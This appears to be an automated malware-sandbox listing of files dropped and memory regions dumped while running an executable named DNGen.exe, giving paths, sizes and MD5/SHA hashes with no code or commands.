C:\Users\Admin\AppData\Local\Google\Chrome\User Data\a5976495-3d06-4800-bd8a-5cbb3b7aa748.tmp

Filesize
2B

MD5
99914b932bd37a50b983c5e7c90ae93b

SHA1
bf21a9e8fbc5a3846fb05b4fa0859e0917b2202f

SHA256
44136fa355b3678a1146ad16f7e8649e94fb4fc21fe77e8310c060f61caaff8a

SHA512
27c74670adb75075fad058d5ceaf7b20c4e7786c83bae8a32f626f9782af34c9a33c2046ef60fd2a7878d378e29fec851806bbd9a67878f3a9f1cda4830763fd

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

Filesize
2KB

MD5
d85ba6ff808d9e5444a4b369f5bc2730

SHA1
31aa9d96590fff6981b315e0b391b575e4c0804a

SHA256
84739c608a73509419748e4e20e6cc4e1846056c3fe1929a8300d5a1a488202f

SHA512
8c414eb55b45212af385accc16d9d562adba2123583ce70d22b91161fe878683845512a78f04dedd4ea98ed9b174dbfa98cf696370598ad8e6fbd1e714f1f249

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
944B

MD5
6d42b6da621e8df5674e26b799c8e2aa

SHA1
ab3ce1327ea1eeedb987ec823d5e0cb146bafa48

SHA256
5ab6a1726f425c6d0158f55eb8d81754ddedd51e651aa0a899a29b7a58619c4c

SHA512
53faffbda8a835bc1143e894c118c15901a5fd09cfc2224dd2f754c06dc794897315049a579b9a8382d4564f071576045aaaf824019b7139d939152dca38ce29

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
948B

MD5
c9b6705519e1eef08f86c4ba5f4286f3

SHA1
6c6b179e452ecee2673a1d4fe128f1c06f70577f

SHA256
0f9cad44a79126871580e19b01dc3f880c5173b1faaf8b9018d5d1f829714705

SHA512
6d8f85a7a8b0b124530f36a157cd0441b5c1eacdc35e274af9fbf0569d03d1d5e468651a5b2425f0215c282ecfa7b1ffeaeeaf18612822f00bd14306d30640c7

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
276798eeb29a49dc6e199768bc9c2e71

SHA1
5fdc8ccb897ac2df7476fbb07517aca5b7a6205b

SHA256
cd0a1056e8f1b6cb5cb328532239d802f4e2aa8f8fcdc0fcb487684bd68e0dcc

SHA512
0d34fce64bbefc57d64fa6e03ca886952263d5f24df9c1c4cce6a1e8f5a47a9a21e9820f8d38caa7f7b43a52336ce00b738ea18419aaa7c788b72e04ce19e4f2

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

Filesize
1KB

MD5
107102102e02e48f37f5318c7e113c43

SHA1
7fb10fc65c85fb4c050309f0872bc9389dcccc0d

SHA256
3c3f49948c1e832c86b959c32bc288ddedb500534b74df082f8967fc7f9976f7

SHA512
b108a47d7c3dd154cad44362b6cd557b7064096383d100e6cd64bfb19c4e2ad878ed4ee800776322ad3cc4bb721fb675b0ecab8f5661024188fa3aa19561841b

Download Submit
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_tns2abbe.vs1.ps1

Filesize
60B

MD5
d17fe0a3f47be24a6453e9ef58c94641

SHA1
6ab83620379fc69f80c0242105ddffd7d98d5d9d

SHA256
96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

SHA512
5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

Download Submit
C:\Users\Admin\Downloads\DNGen.exe

Filesize
217KB

MD5
edd64bb332dd7a6c680b732aaa2c66a5

SHA1
075c1f51fc81f4da6836f02c3f7d4431a7119dac

SHA256
e7775faf001d6a6c259f56cb4c1aaa80ab23358ea0418a595ba114ce3bd71b24

SHA512
47a2f98bb79f1486e44a95e806bb97617d24f74aab4c62b3965fc8ea512d45f1a29dd73dcf36e868d2dd0b9d7ca7e025583cbe6ce88c111c2c1cacf36c8568dd

Download Submit
C:\Users\Admin\Downloads\DNGen.exe

Filesize
217KB

MD5
edd64bb332dd7a6c680b732aaa2c66a5

SHA1
075c1f51fc81f4da6836f02c3f7d4431a7119dac

SHA256
e7775faf001d6a6c259f56cb4c1aaa80ab23358ea0418a595ba114ce3bd71b24

SHA512
47a2f98bb79f1486e44a95e806bb97617d24f74aab4c62b3965fc8ea512d45f1a29dd73dcf36e868d2dd0b9d7ca7e025583cbe6ce88c111c2c1cacf36c8568dd

Download Submit
C:\Users\Admin\Downloads\DNGen.exe

Filesize
217KB

MD5
edd64bb332dd7a6c680b732aaa2c66a5

SHA1
075c1f51fc81f4da6836f02c3f7d4431a7119dac

SHA256
e7775faf001d6a6c259f56cb4c1aaa80ab23358ea0418a595ba114ce3bd71b24

SHA512
47a2f98bb79f1486e44a95e806bb97617d24f74aab4c62b3965fc8ea512d45f1a29dd73dcf36e868d2dd0b9d7ca7e025583cbe6ce88c111c2c1cacf36c8568dd

Download Submit
memory/1592-341-0x000002268DAA0000-0x000002268DABE000-memory.dmp

Filesize
120KB

Download
memory/1592-337-0x00000226A63E0000-0x00000226A6430000-memory.dmp

Filesize
320KB

Download
memory/1592-375-0x000002268DA40000-0x000002268DA4A000-memory.dmp

Filesize
40KB

Download
memory/1592-376-0x00000226A6430000-0x00000226A6442000-memory.dmp

Filesize
72KB

Download
memory/1592-336-0x00000226A6460000-0x00000226A64D6000-memory.dmp

Filesize
472KB

Download
memory/1592-322-0x000002268DA00000-0x000002268DA10000-memory.dmp

Filesize
64KB

Download
memory/1592-308-0x000002268BD10000-0x000002268BD4C000-memory.dmp

Filesize
240KB

Download
memory/2220-362-0x000001FDB7520000-0x000001FDB7530000-memory.dmp

Filesize
64KB

Download
memory/2412-323-0x00000189B4FD0000-0x00000189B4FE0000-memory.dmp

Filesize
64KB

Download
memory/4048-309-0x0000017333440000-0x0000017333462000-memory.dmp

Filesize
136KB

Download